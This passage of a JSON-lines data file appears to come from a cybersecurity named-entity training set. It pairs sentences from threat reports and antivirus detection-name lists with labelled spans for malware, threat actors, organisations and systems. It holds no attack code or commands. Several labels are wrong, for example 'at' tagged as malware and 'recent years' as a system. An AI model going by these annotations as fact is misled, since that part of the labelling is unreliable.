our interest for a number of reasons: few samples appear to be available in the wild; there is no previous documentation referring to the C2 domains and IP addresses it uses despite the domains appearing to be at least twelve months old; and, if its compilation timestamps are to be trusted, the campaign itself may have been active for at least six months before samples started to surface...", "spans": {"ORGANIZATION: Forcepoint Security Labs": [[28, 52]], "MALWARE: 
malware": [[105, 112]], "THREAT_ACTOR: campaign": [[422, 430]]}, "info": {"id": "cyner2_train_005201", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Zenshirsh.SL7 Trojan.DDur.Win32.4 Trojan/DDur.n Win32.Trojan.WisdomEyes.16070401.9500.9937 Trojan.Zlob Win.Trojan.Dnschanger-1136 Trojan.Win32.DDur.xjyd Trojan.Win32.Z.Ddur.16289 Trojan.Packed.253 BehavesLike.Win32.Vundo.lc Trojan.Win32.DNSChanger Win32.Troj.DNSChangerT.kg.14848 Trojan:Win32/Remetrac.C Trojan/Win32.Monder.C72152 BScope.Trojan.Sawbones.vf Win32/Trojan.e0c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005203", "source": "cyner2_train"}} {"text": "A group known as the Cutting Sword of Justice took credit for the Saudi Aramco attack by posting a Pastebin message on the day of the attack back in 2012, and justified the attack as a measure against the Saudi monarchy.", "spans": {"THREAT_ACTOR: group": [[2, 7]], "THREAT_ACTOR: the Cutting Sword of Justice": [[17, 45]], "ORGANIZATION: the Saudi Aramco": [[62, 78]], "ORGANIZATION: Pastebin message": [[99, 115]]}, "info": {"id": "cyner2_train_005205", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader.Murlo.FK Downloader.Murlo.Win32.1632 Trojan/Downloader.Murlo.fk Trojan.Downloader.Murlo.FK Trojan.DL.Murlo!u+ZN6N7ySiY W32/Downldr2.HWY Trojan.Downloader-8985 Trojan-Downloader.Win32.Murlo.fk Trojan.Win32.Murlo.kadq Trojan.Win32.Downloader.2560.J[h] NORMAL:Trojan.DL.Win32.Murlo.c!1185532 Trojan.Downloader.Murlo.FK TrojWare.Win32.TrojanDownloader.Murlo.FK Trojan.Downloader.Murlo.FK Trojan.DownLoader.26702 BehavesLike.Win32.Mamianune.xh TrojanDownloader.Murlo.ar Trojan[Downloader]/Win32.Murlo Win32.TrojDownloader.Murlo.fk.kcloud Win-Trojan/Murlo.2560.J Trojan.Downloader.Murlo.FK Win32/TrojanDownloader.Murlo.FK Trojan-Downloader.Win32.Tiny.hn Win32/Ngvck.BP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005207", "source": "cyner2_train"}} {"text": "A backdoor 
also known as: Win32.Trojan.WisdomEyes.16070401.9500.9818 Riskware.Win32.FileTour.ednjdc Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005209", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.EA17 Trojan.Tibs.BJ Worm/W32.Nuwar.31364 I-Worm.Zhelatin.eo.n1 Worm.Zhelatin.Win32.1360 W32/Zhelatin.eo Trojan.Tibs.BJ W32/EmailWorm.KUL Trojan.Packed.13 Trojan.Small-2710 Email-Worm.Win32.Zhelatin.eo Trojan.Win32.Zhelatin.chkpnw I-Worm.Win32.Zhelatin.31364[h] PE:Worm.Mail.Win32.Zhelatin.eu!1074243991 Trojan.Tibs.BJ Email-Worm.Win32.Zhelatin.eo Trojan.Tibs.BJ Trojan.Packed.140 Trojan.Vxgame.z TROJ_FORUCON.BMC W32/Worm.YFRS-1205 I-Worm/Zhelatin.cna W32/Tibs.EO@mm Worm[Email]/Win32.Zhelatin Worm.Zhelatin.eo.kcloud Trojan.Tibs.BJ Spammer:Win32/Clodpuntor.A Virus.Win32.Heur.d Trojan.Tibs.BJ Trojan.Vxgame.z Trojan-Downloader.Revelation.Tibs.B Worm.Win32.Zhelatin.Az Win32.Worm-email.Zhelatin.Hwwo Packer.Win32.Tibs Trojan.Tibs.BJ Downloader.Tibs.5.BO Trj/Spammer.ABX Win32/Trojan.be3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005211", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGameELXIAUS.Trojan Trojan.Win32.Buzy!O Backdoor.Tenrite.A4 Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_TENRITE_0000000.TOMA Trojan.Win32.Tens.as Trojan.Win32.Buzy.ikstz Trojan.Win32.A.Tens.13312 TrojWare.Win32.Tenrite.A Trojan.Click2.12702 BehavesLike.Win32.BadFile.lz Trojan.Win32.Tenrite TR/Buzy.3083.1 Trojan/Win32.Tens Trojan.Buzy.DC0B Trojan.Win32.Tens.as Backdoor:Win32/Tenrite.A Win32/Tenrite.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005212", "source": "cyner2_train"}} {"text": "A backdoor also known as: Adware.BrowseFox.Win32.220089 Trojan.Razy.D2BA2D Win32.Trojan.WisdomEyes.16070401.9500.9546 Win.Trojan.Server-24 Riskware.Win32.Server.ctchyk Program.Server.260 BehavesLike.Win32.HLLP.fz SPR/SmallHTTP.F GrayWare[Server-Web]/Win32.SmallHTTP 
Riskware.SmallHTTP! not-a-virus:Server-Web.Win32.SmallHTTP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005213", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/OnLineGames.pmt Trojan.Win32.OnLineGames.djktr W32.Gammima.AG Win32/Pebox.Y Trojan-GameThief.Win32.OnLineGames.ajibj Trojan.PWS.OnLineGames!PDfLLBwapmw Trojan.PWS.Wsgame.37257 TR/PSW.OnlineGames.xbkj Trojan/PSW.OnLineGames.bylz PWS:Win32/DNFOnline.A Malware.Gammima!rem Win32/PSW.OnLineGames.PMT Trojan-GameThief.Win32.OnLineGames W32/Onlinegames.AJIBJ!tr PSW.OnlineGames3.ATWL Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005215", "source": "cyner2_train"}} {"text": "The Nyetya attack was a destructive ransomware variant that affected many organizations inside of Ukraine and multinational corporations with operations in Ukraine.", "spans": {"MALWARE: ransomware variant": [[36, 54]], "ORGANIZATION: organizations": [[74, 87]], "ORGANIZATION: multinational corporations": [[110, 136]]}, "info": {"id": "cyner2_train_005216", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Pincav!O Trojan/Pincav.awm Win.Trojan.Pincav-604 Trojan.Win32.Pincav.awn Trojan.Win32.Pincav.drkdnm Trojan.Win32.A.Pincav.1185236 Troj.Clicker.W32.Small.kZ0E Trojan.Pincav.Win32.12742 Trojan/Pincav.chh Trojan/Win32.Pincav Trojan.Graftor.D836A Trojan.Win32.Pincav.awn Backdoor:Win32/Losfondup.A Trojan/Win32.Pincav.R42635 TScope.Trojan.Delf Backdoor.Losfondup!Ng6K/s6DvsI Trojan-PWS.Win32.Delf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005217", "source": "cyner2_train"}} {"text": "Although the use of free web-services as a C2 channel is not new, the use of a Github issue for a command/response channel was interesting.", "spans": {"SYSTEM: Github issue": [[79, 91]], "ORGANIZATION: channel": [[115, 122]]}, "info": {"id": "cyner2_train_005219", "source": "cyner2_train"}} {"text": "A backdoor also known as: 
W32.WinwebA.Trojan TrojanDropper.Henbang.A6 Win32.Worm.AutoRun.c W32/Adware.PXAH-3010 W32.Virut.CF Win32/SillyBHO.OL Worm.Win32.AutoRun.ibh Trojan.Win32.AutoRun.cqpmwl Trojan.MulDrop.32523 BehavesLike.Win32.AdwareBetterSurf.gh W32/Adware.ACXN Win32.Virut.cr.61440 TrojanDropper:Win32/Henbang.A Worm.Win32.AutoRun.ibh Win32.Trojan.Webdat.A Worm/Win32.AutoRun.R56346 Backdoor.WinNT.PcClient Win32/Worm.FakeFolder.FF", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005220", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.RansomwareTQB.Trojan Trojan.ServStart.A Troj.W32.StartServ.tnEy Trojan/ServStart.io Win32.Trojan.ServStart.aj Backdoor.Trojan TROJ_SERVSTART_GJ1000AC.UVPN Trojan.Win32.StartServ.xer Trojan.Win32.Heuristic131.dcnfpc Trojan.Win32.Z.Servstart.196709.QO TrojWare.Win32.ServStart.CA Trojan.Mrblack.3 Trojan.StartServ.Win32.135 TROJ_SERVSTART_GJ1000AC.UVPN Trojan.Win32.ServStart Trojan.Zusy.D23C29 Trojan.Win32.StartServ.xer Backdoor/Win32.Zegost.R117606 Trojan.StartServ Win32/ServStart.IO Win32.Trojan.Startserv.Huzb Win32/Trojan.a35", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005222", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Society.A W32/Society.DR Win32.Trojan.WisdomEyes.16070401.9500.9997 W95.Sosume.3363 PE_ALCAUL.H Win.Trojan.Alcaul-8 Virus.Win32.Alcaul.h Win32.Society.A Virus.Win32.Alcaul.ue W32.Alcaul.h!c Win32.Society.A Virus.Win32.Alcaul.h Win32.Society.A Win95.Necromancer.3363 PE_ALCAUL.H BehavesLike.Win32.Mental.xz W32/Risk.GISN-1213 Win32/Alcaul.h W32/Alcaul.H W32/Alcaul.H!tr.dr Virus/Win32.Alcaul Win32.Society.A Backdoor:Win32/Society.A Virus.Win9x.Repus Win32.Society.A W32/Alcal.F", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005224", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.Dapato!O TrojanClicker.Baffec.A10 Trojan.Downloader Downloader.Dapato.Win32.1470 
Trojan/Downloader.Dapato.fxd Win32.Trojan.WisdomEyes.16070401.9500.9610 TROJ_DAPATO_CA08278A.TOMC Trojan-Downloader.Win32.Dapato.fxd Trojan.Win32.Dapato.bxnvih Trojan.Downloader-Dapato Win32.Trojan-downloader.Dapato.Srdc TrojWare.Win32.Downloader.Dapato.FXD Trojan.DownLoad3.2529 TROJ_DAPATO_CA08278A.TOMC Trojan-Downloader.Win32.Dapato TrojanDownloader.Dapato.atd Trojan[Downloader]/Win32.Dapato TrojanClicker:Win32/Baffec.A Trojan.Delf.28 Trojan-Downloader.Win32.Dapato.fxd Downloader/Win32.Dapato.R22620 TrojanDownloader.Dapato Trojan.DL.Dapato!K0jxx5EHs9Y", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005226", "source": "cyner2_train"}} {"text": "Ongoing reporting by ClearSky", "spans": {}, "info": {"id": "cyner2_train_005227", "source": "cyner2_train"}} {"text": "The users of this app include many well known celebrities who eventually post the dubbed videos on popular social networking platforms like Facebook and Twitter.", "spans": {"ORGANIZATION: Facebook": [[140, 148]], "ORGANIZATION: Twitter.": [[153, 161]]}, "info": {"id": "cyner2_train_005228", "source": "cyner2_train"}} {"text": "Social networking sites Facebook and Twitter are primarily being used to spread a shortened URL using bit.ly service that points to a Google Cloud Server hosting the malicious payload with .COM or .EXE file extensions.", "spans": {"ORGANIZATION: Facebook": [[24, 32]], "ORGANIZATION: Twitter": [[37, 44]], "SYSTEM: Google Cloud Server hosting": [[134, 161]]}, "info": {"id": "cyner2_train_005231", "source": "cyner2_train"}} {"text": "This report documents some of our recent findings regarding its cryptography, network behavior,and banking targets.", "spans": {"THREAT_ACTOR: cryptography, network behavior,and": [[64, 98]], "ORGANIZATION: banking targets.": [[99, 115]]}, "info": {"id": "cyner2_train_005232", "source": "cyner2_train"}} {"text": "Earlier this year, the SpiderLabs team at Trustwave investigated a series of bank breaches originating from 
postSovietstates.", "spans": {"ORGANIZATION: the SpiderLabs team": [[19, 38]], "MALWARE: at": [[39, 41]], "ORGANIZATION: Trustwave": [[42, 51]]}, "info": {"id": "cyner2_train_005233", "source": "cyner2_train"}} {"text": "This banking malware can steal login credentials from 94 different mobile banking apps.", "spans": {"MALWARE: This banking malware": [[0, 20]], "SYSTEM: mobile banking apps.": [[67, 87]]}, "info": {"id": "cyner2_train_005235", "source": "cyner2_train"}} {"text": "In a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and persistence mechanisms.", "spans": {"THREAT_ACTOR: campaign, FIN7": [[22, 36]]}, "info": {"id": "cyner2_train_005236", "source": "cyner2_train"}} {"text": "We also discovered two previously unknown payloads.These payloads contained backdoors that we have named BYEBY and PYLOT respectively.", "spans": {"MALWARE: unknown payloads.These payloads": [[34, 65]], "MALWARE: backdoors": [[76, 85]], "MALWARE: BYEBY": [[105, 110]], "MALWARE: PYLOT": [[115, 120]]}, "info": {"id": "cyner2_train_005237", "source": "cyner2_train"}} {"text": "Our research showed that the spear phishing emails came from multiple compromised email accounts tied to a legitimate domain in North East Asia.", "spans": {}, "info": {"id": "cyner2_train_005242", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrjnDwnldrMSIL.Ranos.A4 MSIL.Trojan.Injector.q BKDR_RANOS.SM TrojWare.MSIL.TrojanDownloader.Small.DS Trojan.Starter.2890 BKDR_RANOS.SM Trojan.Jintor.1 TrojanDownloader:MSIL/Ranos.A Trojan.Win32.Fsysna MSIL/Injector.CKC!tr Trj/GdSda.A Win32/Trojan.e2d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005243", "source": "cyner2_train"}} {"text": "Some of the tactics used in APT attacks die hard.", "spans": {"THREAT_ACTOR: APT attacks": [[28, 39]]}, "info": {"id": "cyner2_train_005245", "source": "cyner2_train"}} {"text": "How does Gooligan work ? 
The infection begins when a user downloads and installs a Gooligan-infected app on a vulnerable Android device .", "spans": {"MALWARE: Gooligan": [[9, 17]], "MALWARE: Gooligan-infected": [[83, 100]]}, "info": {"id": "cyner2_train_005248", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9931 W32/Trojan.MNLT-0240 TR/Crypt.Xpack.rxrlk Trojan.Symmi.D136A2 Win32/Trojan.859", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005250", "source": "cyner2_train"}} {"text": "This new process downloads and executes the final stage: a Remote Administration Tool RAT based on Gh0st RAT.", "spans": {"MALWARE: a Remote Administration Tool RAT": [[57, 89]], "MALWARE: Gh0st RAT.": [[99, 109]]}, "info": {"id": "cyner2_train_005251", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Spy.Win32.TravNet.vmq Trojan.PWS.Spy.17858 Trojan.Win32.Webprefix Trojan.Zusy.D124FE Trojan-Spy.Win32.TravNet.vmq TrojanDownloader:Win32/Travnet.B Trojan/Win32.Travnet.R99919 Trojan.Farfli!4lB/nc8HSss W32/Farfli.LI TrojanSpy.TravNet Win32/Trojan.Multi.daf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005254", "source": "cyner2_train"}} {"text": "The oldest sample we found was created in 2009, indicating this tool has been in use for almost seven years.", "spans": {"MALWARE: tool": [[64, 68]]}, "info": {"id": "cyner2_train_005255", "source": "cyner2_train"}} {"text": "Earlier this year, we talked about how cybercriminals took advantage of the popularity of Pokemon Go to launch their own malicious apps.", "spans": {"SYSTEM: Pokemon Go": [[90, 100]], "MALWARE: own malicious apps.": [[117, 136]]}, "info": {"id": "cyner2_train_005257", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Krypt.drmwlo BehavesLike.Win32.Backdoor.gh TR/Krypt.503296 Trojan.MSIL.Bladabindi.1 Trj/CI.A Trojan.VB.Inject MSIL/Bbindi.W!tr", "spans": 
{"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005258", "source": "cyner2_train"}} {"text": "Mozilla products that don't contain the PDF Viewer, such as Firefox for Android, are not vulnerable.", "spans": {"ORGANIZATION: Mozilla": [[0, 7]], "SYSTEM: Firefox for Android,": [[60, 80]], "VULNERABILITY: vulnerable.": [[89, 100]]}, "info": {"id": "cyner2_train_005259", "source": "cyner2_train"}} {"text": "we are currently working with Adobe to confirm the CVE number for this exploit", "spans": {"ORGANIZATION: Adobe": [[30, 35]], "VULNERABILITY: CVE number": [[51, 61]], "MALWARE: exploit": [[71, 78]]}, "info": {"id": "cyner2_train_005260", "source": "cyner2_train"}} {"text": "The malware likely required a significant amount of time and knowledge to create.", "spans": {}, "info": {"id": "cyner2_train_005261", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Crack2000.Win32.1 Trojan/.hack Win.Trojan.HackDream-1 Trojan.IRC.Hack Trojan.Win32.Hack.fvvy TrojWare.IRC.Hack.A Trojan.IrcHack BehavesLike.Win32.Dropper.tc Trojan/IRC.Hack JS/IRC.bdmlu Trojan/IRC.Hack Trojan.Win32.IRCHack.546218 Trojan.IRC.Hack Trojan.2000Cracks IRC/Hack.A IRC/Hack.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005262", "source": "cyner2_train"}} {"text": "The addition of DNS-based exfiltration is new for this malware family; however, other POS malware families such as BernhardPOS and FrameworkPOS have used this technique in the past.", "spans": {"VULNERABILITY: DNS-based exfiltration": [[16, 38]], "MALWARE: malware family;": [[55, 70]], "MALWARE: POS malware families": [[86, 106]], "MALWARE: BernhardPOS": [[115, 126]], "MALWARE: FrameworkPOS": [[131, 143]]}, "info": {"id": "cyner2_train_005263", "source": "cyner2_train"}} {"text": "How does the malware work without code for these key components ? 
As is characteristic for obfuscated threats , the malware has encrypted binary code stored in the Assets folder : When the malware runs for the first time , the static block of the main class is run .", "spans": {}, "info": {"id": "cyner2_train_005264", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-GameThief.Win32.OnLineGames!O Trojan.OnLineGames.Win32.215966 Trojan.Heur.RP.cmIfaG!Q79i TSPY_ONLINEG.TGV Win32.Trojan.WisdomEyes.16070401.9500.9941 Win32/Zuten.DK TSPY_ONLINEG.TGV Trojan-GameThief.Win32.OnLineGames.afmb Trojan.Win32.OnLineGames.cvmqrs Troj.GameThief.W32.OnLineGames.afmb!c TrojWare.Win32.Magania.~D Trojan.PWS.Gamania.9849 BehavesLike.Win32.Sytro.nc Virus.Win32.Onlinegames.BBH TrojanDownloader.Small.unq Trojan[GameThief]/Win32.OnLineGames Trojan:Win32/Hookja.A Trojan-GameThief.Win32.OnLineGames.afmb Trojan/Win32.OnlineGameHack.R70066 Trojan.Win32.OnlineGames.10068 Win32.Trojan-gamethief.Onlinegames.Wvkq W32/Onlinegames.KKW!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005266", "source": "cyner2_train"}} {"text": "One of the most profitable cyber crimes in recent years is ATM robbery, where the cyber criminals extract cash directly from automated teller machines that have already been infected with malware, causing millions of dollars in loss for the banks worldwide.", "spans": {"THREAT_ACTOR: cyber crimes": [[27, 39]], "SYSTEM: recent years": [[43, 55]], "SYSTEM: ATM": [[59, 62]], "THREAT_ACTOR: cyber criminals": [[82, 97]], "SYSTEM: automated teller machines": [[125, 150]], "MALWARE: malware,": [[188, 196]], "ORGANIZATION: banks": [[241, 246]]}, "info": {"id": "cyner2_train_005268", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransome.Crowti.OB4 Tool.Patcher.Win32.14244 Trojan/Filecoder.CryptoWall.d Win32.Trojan.Filecoder.h Ransom.Cryptodefense Ransom_HPCRYPTESLA.SM2 Trojan.Win32.Encoder.dytusk Trojan.Encoder.514 Win32.Malware!Drop Ransom_HPCRYPTESLA.SM2 Variant.Symmi.bop 
TR/AD.Crowti.Y.580 Packed.Win32.Tpyn Win32.Trojan-Ransom.TeslaCrypt.N Win-Trojan/Inject.249861 Win32.Malware!Drop Win32/Filecoder.CryptoWall.D Trojan.Filecoder!cG6QHMIV+ig Trojan.Win32.Filecoder", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005269", "source": "cyner2_train"}} {"text": "A backdoor also known as: Adware.DLBoost.A4 Win32.Trojan.WisdomEyes.16070401.9500.9658 Exploit.Win32.Simadona.b Exploit.Win32.Simadona.eqnhht Trojan.RoboInstall.6 BehavesLike.Win32.Backdoor.wc Trojan.Win32.HackTool HackTool:Win32/Skipun.A!bit Exploit.Win32.Simadona.b PUP/Win32.DLBoost.C1760189 Win32/Trojan.Exploit.09b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005270", "source": "cyner2_train"}} {"text": "Over the course of the last year, ESET has detected and analyzed several instances of malware used for targeted espionage – dubbed SBDH toolkit.", "spans": {"ORGANIZATION: ESET": [[34, 38]], "MALWARE: malware": [[86, 93]], "THREAT_ACTOR: targeted espionage": [[103, 121]], "MALWARE: dubbed SBDH toolkit.": [[124, 144]]}, "info": {"id": "cyner2_train_005271", "source": "cyner2_train"}} {"text": "This article discusses a group of PlugX samples which we believe are all used by the same attackers, and the measures they have taken to attempt to bypass security mechanisms.", "spans": {"MALWARE: PlugX": [[34, 39]], "THREAT_ACTOR: the same attackers,": [[81, 100]]}, "info": {"id": "cyner2_train_005273", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Obfuscated.en!O Trojan.Obfuscated.Win32.70479 Troj.W32.Obfuscated.tpfc Trojan/Obfuscated.a1 Win32.Trojan.WisdomEyes.16070401.9500.9999 Adware.Lop Win.Trojan.Obfus-22 Trojan.Win32.Obfuscated.en Virus.Win32.Sality.bgiylc Trojan.Win32.Obfuscated.3771904 TrojWare.Win32.Obfuscated.en Trojan.Packed.149 BehavesLike.Win32.Dropper.jh Trojan-Downloader.Win32.Swizzor Trojan/Win32.Obfuscated Win32.Troj.ObfuscatedT.cz.545792 Trojan:Win32/C2Lop.C Adware.Lop-Variant 
Trojan.Win32.Obfuscated.en MalwareScope.Trojan-Downloader.Obfuscated.2 Win32/Obfuscated.A1 W32/Swizzor.B!tr Win32/Trojan.Obfus.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005274", "source": "cyner2_train"}} {"text": "We are uncertain of its objectives but estimate it is criminally motivated.", "spans": {}, "info": {"id": "cyner2_train_005277", "source": "cyner2_train"}} {"text": "These attacks are themed around Middle Eastern political issues and the motivation appears to relate to espionage, as opposed to opportunistic or criminal intentions.", "spans": {"THREAT_ACTOR: espionage,": [[104, 114]]}, "info": {"id": "cyner2_train_005279", "source": "cyner2_train"}} {"text": "A backdoor also known as: BackDoor-CUR.svr Win32.Backdoor.Detarmal.b Backdoor.Trojan Backdoor.Win32.Delf.NBJ BackDoor.Cae.7 BehavesLike.Win32.Upatre.qh Backdoor:Win32/Detarmal.A Win32/Delf.NBJ W32/Detarmal.A!tr Bck/Furaxdoor.B Backdoor.Win32.Detarmal.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005280", "source": "cyner2_train"}} {"text": "A backdoor also known as: TROJ_GE.71380BE1 Trojan.Java.Crypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005281", "source": "cyner2_train"}} {"text": "However in this campaign, the binary payload, which was later found to be a NanoCore RAT client, is actually embedded in the obfuscated HTA.", "spans": {"THREAT_ACTOR: campaign,": [[16, 25]], "MALWARE: the binary payload,": [[26, 45]], "MALWARE: a NanoCore RAT client,": [[74, 96]]}, "info": {"id": "cyner2_train_005282", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.5B76 Trojan.Win32.Yakes.vpjr Trojan.Fakealert.49835 BehavesLike.Win32.PUPXAX.gc W32/Trojan.TMDY-2947 TR/Crypt.ZPACK.mnboo Trojan.Razy.D13B86 Trojan.Win32.Yakes.vpjr W32/Kryptik.EZWB!tr Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005284", "source": "cyner2_train"}} {"text": "LeakerLocker claims 
to have made an unauthorized backup of a phone's sensitive information that could be leaked to a user's contacts unless it receives a modest ransom.", "spans": {"MALWARE: LeakerLocker": [[0, 12]]}, "info": {"id": "cyner2_train_005285", "source": "cyner2_train"}} {"text": "We have made the connection to Bitter APT through tactics, techniques, and procedures TTPs that have been observed in other publications, such as the use of Microsoft Office exploits through Excel files, and the use of CHM and Windows Installer MSI files.", "spans": {"THREAT_ACTOR: Bitter APT": [[31, 41]], "MALWARE: Microsoft Office exploits": [[157, 182]], "SYSTEM: CHM": [[219, 222]], "SYSTEM: Windows Installer MSI": [[227, 248]]}, "info": {"id": "cyner2_train_005286", "source": "cyner2_train"}} {"text": "Pawn Storm is an active cyber espionage actor group that has been very aggressive and ambitious in recent years.", "spans": {"THREAT_ACTOR: Pawn Storm": [[0, 10]], "THREAT_ACTOR: cyber espionage actor group": [[24, 51]]}, "info": {"id": "cyner2_train_005289", "source": "cyner2_train"}} {"text": "Telegram using IP address from Spain.", "spans": {"SYSTEM: Telegram": [[0, 8]]}, "info": {"id": "cyner2_train_005290", "source": "cyner2_train"}} {"text": "Today RSA is reporting GlassRAT, a previously undetectable Remote Access Tool RAT which was discovered by the RSA Incident Response Team and investigated by RSA Research during an engagement with a multi-national enterprise.", "spans": {"ORGANIZATION: RSA": [[6, 9]], "MALWARE: GlassRAT,": [[23, 32]], "MALWARE: Remote Access Tool RAT": [[59, 81]], "ORGANIZATION: RSA Incident Response Team": [[110, 136]], "ORGANIZATION: RSA Research": [[157, 169]], "ORGANIZATION: multi-national enterprise.": [[198, 224]]}, "info": {"id": "cyner2_train_005292", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Nanspy Worm.Nanspy.Win32.9 Win32.Trojan.WisdomEyes.16070401.9500.9990 W32/Nanspy.TXTE-7172 W32.Kassbot.B Win.Worm.Nanspy-1 
Net-Worm.Win32.Nanspy.e Trojan.Win32.Nanspy.fwie W32.W.Bagle.kZt7 Heur.Packed.MultiPacked BackDoor.Pyev BehavesLike.Win32.HLLPPhilis.nc Trojan-Dropper.Delf W32/Nanspy.O I-Worm/Nanspy.d WORM/Nanspy.E Backdoor:Win32/Nanspy.D Worm.Win32.Net-Nanspy.34368.B Trojan/Win32.Lydra.R96925 Net-Worm.Win32.Nanspy.e Worm.Nanspy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005293", "source": "cyner2_train"}} {"text": "As such, this new attack represents a dangerous new hybrid combining the work of a notorious cyber criminal gang with Chinese cyber espionage group to attack a financial services firm.", "spans": {"THREAT_ACTOR: cyber criminal gang": [[93, 112]], "THREAT_ACTOR: Chinese cyber espionage group": [[118, 147]], "ORGANIZATION: financial services firm.": [[160, 184]]}, "info": {"id": "cyner2_train_005296", "source": "cyner2_train"}} {"text": "FireEye recently discovered a new variant of a point of sale POS malware family known as NewPosThings.", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "MALWARE: new variant of a point of sale POS malware family": [[30, 79]], "MALWARE: NewPosThings.": [[89, 102]]}, "info": {"id": "cyner2_train_005297", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Imiserv.245760 Trojan.Imiserv.c Trojan/Imiserv.c Trojan.Win32.Malware.1 Win32/Imiserv.C Adware.IEPlugin Trojan.Win32.Imiserv.c Trojan.Win32.Imiserv.B TrojWare.Win32.Imiserv.C Trojan.Win32.Imiserv.c TROJ_IMISERVER.A Trojan.Win32.Imiserv!IK Trojan.Win32.Imiserv.B Win-Trojan/Imiserv.245760 Trojan.Win32.Imiserv.c Trojan.Imiserv.G Trojan.Win32.Imiserv W32/Imiserv.C!tr Trj/Imiserv.M", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005298", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Clicker.Win32.VB!O Trojan.VB.al3 Trojan.VB.Win32.56708 W32/Clicker.VB.fli TROJ_LNKIEB.SMI Win32/VB.BHE TROJ_LNKIEB.SMI Win.Trojan.Clicker-4258 Trojan-Clicker.Win32.VB.fli Trojan.Win32.VB.cnwqrx 
Trojan.Win32.A.Clicker.36892 Win32.Trojan.Vb.Angm TrojWare.Win32.Injector.AMXL TrojanClicker.VB.ffy TR/Lnkiebes.A.6 Trojan[Clicker]/Win32.VB Trojan.Buzy.D6DC Trojan-Clicker.Win32.VB.fli Trojan:Win32/Lnkiebes.A Trojan/Win32.VB.R5515 Trojan.VBRA.03765 Win32/Spy.Chekafev.AD Trojan.CL.VB!fBU5Dy6sJXo Trojan-Clicker.Win32.VB W32/VB.F!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005299", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Spy/W32.Small.9216.J Trojan/TopAntiSpyware.i TROJ_ANTISPY.B Win32.Trojan.WisdomEyes.16070401.9500.9859 W32/Trojan.QAS Adware.Topantispyware Win32/DlExaw.E TROJ_ANTISPY.B Html.Trojan.ClickerSmall-71 Trojan.Win32.TopAntiSpyware.j Trojan.Win32.TopAntiSpyware.ehkl Troj.W32.TopAntiSpyware.j!c Win32.Trojan.Topantispyware.Wsju TrojWare.Win32.TopAntiSpyware.~BAAB Trojan.DownLoader.2049 BehavesLike.Win32.Virut.zh Trojan.Win32.TopAntiSpyware.J W32/Trojan.MSMO-2253 Trojan/TopAntiSpyware.c Trojan/Win32.TopAntiSpyware Trojan:Win32/TopAntiSpyware.J Trojan.Win32.TopAntiSpyware.j Trojan/Win32.Adload.C82279 Adware.WarSpy.G", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005300", "source": "cyner2_train"}} {"text": "Locky .diablo6 campaign", "spans": {"MALWARE: Locky 